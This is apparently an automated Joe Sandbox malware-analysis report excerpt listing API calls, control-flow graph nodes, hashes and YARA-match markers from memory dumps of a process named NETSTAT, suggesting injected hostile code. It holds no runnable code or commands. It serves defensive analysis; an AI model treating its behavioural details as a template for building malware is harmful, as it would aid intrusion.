                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: 1:C
                                  • API String ID: 2738559852-278173926
                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction ID: 17e68fa86f8a719825abd443e563186f8fa84402d9f001efd4fdd55f883f758b
                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction Fuzzy Hash: 58F0A9B2200109ABDB14DF89DC85DEB77ADAF8C754F158249BA1D97241D630E911CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 371 438710-438739 call 4391e0 NtClose
                                  APIs
                                  • NtClose.NTDLL(P=C,?,?,00433D50,00000000,FFFFFFFF), ref: 00438735
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID: P=C
                                  • API String ID: 3535843008-381726518
                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction ID: 4567df0067dbdee967d52ed57b35c24c5d3ba1ded9ee64c90a31a104e22ed557
                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction Fuzzy Hash: 5CD012756002146BD710EB99CC45E97775CEF48750F154459BA185B242C570FA00C6E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00422D11,00002000,00003000,00000004), ref: 004387F9
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: c9ce71e7a4414bb95fc17589061c83829cb9bd23eac757867d227018ff2652ca
                                  • Instruction ID: 1426a1f7f6549cad38c835868ead2a752c1307e16aabc9ddbfe804575b9908c8
                                  • Opcode Fuzzy Hash: c9ce71e7a4414bb95fc17589061c83829cb9bd23eac757867d227018ff2652ca
                                  • Instruction Fuzzy Hash: 5D0116B6200209AFDB14DF88DC81DEB77A9EF88754F118659FA1897241D631ED11CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00422D11,00002000,00003000,00000004), ref: 004387F9
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: f61a60d01f2d99f4790b130ff0200a919f9502da97413b66cc1fdfd57f1511bc
                                  • Instruction ID: 0c91a2be2db319d1028905c625fb33e710676f1376ab35637cbaa2099da72e42
                                  • Opcode Fuzzy Hash: f61a60d01f2d99f4790b130ff0200a919f9502da97413b66cc1fdfd57f1511bc
                                  • Instruction Fuzzy Hash: EEF058B1200218ABDB14DF89CC80EAB77ADEF8C744F108159FA08A7241C630F810CBE4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00422D11,00002000,00003000,00000004), ref: 004387F9
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction ID: 45039d414b1e406a57b131ab423a69ac75ea43067f2a0f389b707d5bf933b4b8
                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction Fuzzy Hash: 38F015B2200209ABDB14DF89CC81EAB77ADAF8C754F118149FE08A7241C630F910CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmp
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 93cd7824ada908a4c545d49a4c66b7a40e26cf0cca1e679267a7eb2f3055738e
                                  • Instruction ID: b2fe7419a41b59a2490d8bbcaefc375df65c0f71a143d86af419e72346f85b77
                                  • Opcode Fuzzy Hash: 93cd7824ada908a4c545d49a4c66b7a40e26cf0cca1e679267a7eb2f3055738e
                                  • Instruction Fuzzy Hash: 179002A1211C0252D20065694C24B07011597D034BFA1C115A0154594CCD5588616561
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmp
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 24aaa5e2e0b3e5662507420e4f93f38e4df28cfc7b9597b50e29f129016f52fc
                                  • Instruction ID: d5bafa65418ff5fa0f81d066002b5c9cfc9c0ab59ccb62e2ee2e9746e9fab5d5
                                  • Opcode Fuzzy Hash: 24aaa5e2e0b3e5662507420e4f93f38e4df28cfc7b9597b50e29f129016f52fc
                                  • Instruction Fuzzy Hash: 709002A1242443625545B15944145074116A7E02897E1C012A1414990C89669856E661
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmp
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4092d9e64ec30daf70f76dc58fc1e5943dc0ab6bb7a453927aba3b75d9c7c2cb
                                  • Instruction ID: 26d1c1b1b033e916e5c7dabf8ea83231b495c2723d6ebebce8d122b51692edb0
                                  • Opcode Fuzzy Hash: 4092d9e64ec30daf70f76dc58fc1e5943dc0ab6bb7a453927aba3b75d9c7c2cb
                                  • Instruction Fuzzy Hash: DD9002B120140623D11161594514707011997D0289FE1C412A0424598D9A968952B161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmp
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: e187acc8b484b1cb983f979c3cd6a5881af2e5c8e134c93e74c4646bc22a71c3
                                  • Instruction ID: 9b04912fdf89dc5139847dd6f87f82deb126d17357ed27c259dd8cdc697b14ba
                                  • Opcode Fuzzy Hash: e187acc8b484b1cb983f979c3cd6a5881af2e5c8e134c93e74c4646bc22a71c3
                                  • Instruction Fuzzy Hash: 859002E134140652D10061594424B070115D7E1349FA1C015E1064594D8A59CC527166
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmp
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d148126778e1c952769800953edfa141bda4c775318c40196f93e635f2401026
                                  • Instruction ID: 5cd625387d5bd5d9c05d8faf4f751679da63e5466c6485b06a1d9f8e772e9dde
                                  • Opcode Fuzzy Hash: d148126778e1c952769800953edfa141bda4c775318c40196f93e635f2401026
                                  • Instruction Fuzzy Hash: 499002F120140612D14071594414747011597D0349FA1C011A5064594E8A998DD576A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmp
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 965549c9d6707220f54fecdfe0e39bd2692ac505609fdd43931fb4f3a9b705b4
                                  • Instruction ID: 2574a17aa7b2a40cd9e223ece5b65a926ee509d930d85cd1b055ce3493fdb334
                                  • Opcode Fuzzy Hash: 965549c9d6707220f54fecdfe0e39bd2692ac505609fdd43931fb4f3a9b705b4
                                  • Instruction Fuzzy Hash: ED9002B120140A52D10061594414B47011597E0349FA1C016A0124694D8A55C8517561
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmp
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: cbff523814e3eb8479d9691ef9dab5fdb15b3961a5e3b354fa90fcebf646e1f7
                                  • Instruction ID: fc2179e2f0c150fdc7c11f0d69bb706d9fcf1ca0ee5500d00a87702c684e2652
                                  • Opcode Fuzzy Hash: cbff523814e3eb8479d9691ef9dab5fdb15b3961a5e3b354fa90fcebf646e1f7
                                  • Instruction Fuzzy Hash: 269002B120148A12D1106159841474B011597D0349FA5C411A4424698D8AD588917161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmp
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 849ff344b445edf3a0956af19abbb0b2cf07766c33dc5f08265bbb0d9828a28d
                                  • Instruction ID: 7f83490c2e7820a369d981bb89e58c35e87dc4e8bafa11ae6a339ba4ecfd00d2
                                  • Opcode Fuzzy Hash: 849ff344b445edf3a0956af19abbb0b2cf07766c33dc5f08265bbb0d9828a28d
                                  • Instruction Fuzzy Hash: 9C9002B120544A52D14071594414A47012597D034DFA1C011A00646D4D9A658D55B6A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmp
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ce3be183866c73e23954fa3ff5a96809236417f4494f1a01f52c90eaae864257
                                  • Instruction ID: b1da9254d40d37b061a5e1a7750f4d1add9d0438132ca1b068ce1edc942f92ad
                                  • Opcode Fuzzy Hash: ce3be183866c73e23954fa3ff5a96809236417f4494f1a01f52c90eaae864257
                                  • Instruction Fuzzy Hash: 249002B120140A12D1807159441464B011597D1349FE1C015A0025694DCE558A5977E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmp
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmp
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmp
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmp
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmp
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 221 437300-43732f 222 43733b-437342 221->222 223 437336 call 43a020 221->223 224 437348-437398 call 43a0f0 call 429b40 call 433e50 222->224 225 43741c-437422 222->225 223->222 232 4373a0-4373b1 Sleep 224->232 233 4373b3-4373b9 232->233 234 437416-43741a 232->234 235 4373e3-437403 233->235 236 4373bb-4373e1 call 436f30 233->236 234->225 234->232 237 437409-43740c 235->237 238 437404 call 437130 235->238 236->237 237->234 238->237
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 004373A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 241 4372f6-437342 call 43a020 245 437348-437398 call 43a0f0 call 429b40 call 433e50 241->245 246 43741c-437422 241->246 253 4373a0-4373b1 Sleep 245->253 254 4373b3-4373b9 253->254 255 437416-43741a 253->255 256 4373e3-437403 254->256 257 4373bb-4373e1 call 436f30 254->257 255->246 255->253 258 437409-43740c 256->258 259 437404 call 437130 256->259 257->258 258->255 259->258
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 004373A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 365 4388f0-438906 366 43890c-438921 RtlFreeHeap 365->366 367 438907 call 4391e0 365->367 367->366
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00423B93), ref: 0043891D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 362 4388b0-4388e1 call 4391e0 RtlAllocateHeap
                                  APIs
                                  • RtlAllocateHeap.NTDLL(65C,?,00433CAF,00433CAF,?,00433536,?,?,?,?,?,00000000,00000000,?), ref: 004388DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID: 65C
                                  • API String ID: 1279760036-2453901996
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 368 4388ec-438907 call 4391e0 370 43890c-438921 RtlFreeHeap 368->370
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00423B93), ref: 0043891D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 004272DA
                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 004272FB
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 497 42d428-42d42d 498 42d481-42d4c4 call 43a140 call 428a30 call 439690 call 427120 497->498 499 42d42f-42d454 call 433e50 497->499 513 42d4c6-42d4cc 498->513 514 42d4cd-42d4f1 call 43a3b0 498->514 506 42d456-42d45b SetErrorMode 499->506 507 42d45d-42d460 499->507 506->507 517 42d4f2-42d4fa 514->517 518 42d501-42d50a call 4292a0 517->518 519 42d4fc-42d4ff 517->519 520 42d50d-42d523 call 43ac40 518->520 519->518 519->520 525 42d546-42d548 520->525 526 42d525-42d543 call 43a3b0 call 43a0c0 520->526 527 42d5b7-42d5c2 525->527 528 42d54a-42d54d 525->528 526->525 530 42d5c3-42d5cb 528->530 531 42d54f-42d566 call 433a50 528->531 537 42d5a1-42d5a8 531->537 538 42d568-42d593 call 42d2b0 531->538 537->517 540 42d5ae-42d5b6 537->540 538->540 542 42d595-42d59f call 43a0a0 538->542 542->537
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,00427C83,?), ref: 0042D45B
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00429BB2
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 004389B4
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,00427C83,?), ref: 0042D45B
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 004389B4
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0042CCF0,?,?), ref: 0043746C
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0042CCF0,?,?), ref: 0043746C
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0042CFC2,0042CFC2,?,00000000,?,?), ref: 00438A80
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0042CFC2,0042CFC2,?,00000000,?,?), ref: 00438A80
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,00427C83,?), ref: 0042D45B
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
